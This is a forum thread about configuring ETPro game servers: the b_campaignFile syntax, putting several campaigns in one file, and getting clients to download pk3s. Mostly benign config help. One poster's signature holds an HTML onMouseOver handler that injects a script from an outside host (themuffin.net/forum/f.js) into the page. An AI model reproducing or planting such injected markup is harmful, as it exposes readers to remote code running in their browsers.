2.06 Beta Syntax
Moderators: Forum moderators, developers
2.06 Beta Syntax
I want to try and use the b_campaignFile setting in my configs, but just need to know the proper syntax.
Do you reference the .cfg file that loads a campaign?
example: set b_campaignFile "wsfetpro.cfg"
Or... Do you reference the .pk3 file?
Thanks
Do you reference the .cfg file that loads a campaign?
example: set b_campaignFile "wsfetpro.cfg"
Or... Do you reference the .pk3 file?
Thanks
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
- =FF=im2good4u
- Posts: 3821
- Joined: Wed Feb 05, 2003 7:30 am
- Location: The Netherlands, HOLLAND
- Contact:
i tought to the .pk3 file

Code: Select all
new: b_campaignFile allows admin to specify specific campaign file, to prevent server from referencing every pk3 on the server and forcing players to download every referenced pk3 on the server

The Syntax is at least it works this way for me.
Code: Select all
b_campaignFile "scripts/xxx.campaign"
That makes sense....
Thanks Uber...

Thanks Uber...

WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
- =FF=im2good4u
- Posts: 3821
- Joined: Wed Feb 05, 2003 7:30 am
- Location: The Netherlands, HOLLAND
- Contact:
ups

- Chairman Kaga
- Posts: 64
- Joined: Mon Aug 04, 2003 9:00 pm
What if you have more than one campaign?
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
Put them in the same file. You can define more then one campaign inside a single file, just make shure they don't have the same (short)name.Chairman Kaga wrote:What if you have more than one campaign?
For example place both in the same file.
Code: Select all
{
name "xxx 1"
shortname "cmpgn_xxx1"
description " Campaign 1"
maps "battery;goldrush;radar"
mapTC 374 374
type "wolfmp"
}
{
name "xxx 2"
shortname "cmpgn_xxx2"
description "Campaign 2"
maps "northpole;mp_beach;fueldump"
mapTC 374 374
type "wolfmp"
}
- Chairman Kaga
- Posts: 64
- Joined: Mon Aug 04, 2003 9:00 pm
Ah, I didn't know that was possible. Leet.
Now I have to remember which pk3s I hacked the campaigns out of...
Now I have to remember which pk3s I hacked the campaigns out of...
Steve (aka Chairman Kaga)
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
Proud member of Major League Killers
=MLK= International House of Panzer: 64.185.229.60:27960
Then which campaign starts if your server is restarted?Put them in the same file. You can define more then one campaign inside a single file, just make shure they don't have the same (short)name.
The first one?
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
Neither. The server configuration has to explicitly load a campaign.WSF|Otter wrote:Then which campaign starts if your server is restarted?
The first one?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
That's what I thought....
Thanks Rain...

Thanks Rain...
WSF|Otter
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
Founder and Leader
Wolf Strike Force
http://wolfstrikeforce.com
WSF ET Pro Game Server - 69.57.143.174:27960
- =FF=im2good4u
- Posts: 3821
- Joined: Wed Feb 05, 2003 7:30 am
- Location: The Netherlands, HOLLAND
- Contact:
try putting a champaing into it
our =FF= server also has all stuff inside 1 file

our =FF= server also has all stuff inside 1 file

Just put it into the etpro instead of etmain directory. Every .pk3 within the etpro dir has to exist also on the clients.V6.Sven wrote:Is it possable to use this to force the client to download a specific pk3 that doens't contain a map file? I made a soundpack which doesn't get downloaded to the client automatically. It only works if the client downloaded it from my site. It would be easier if they got it automatically.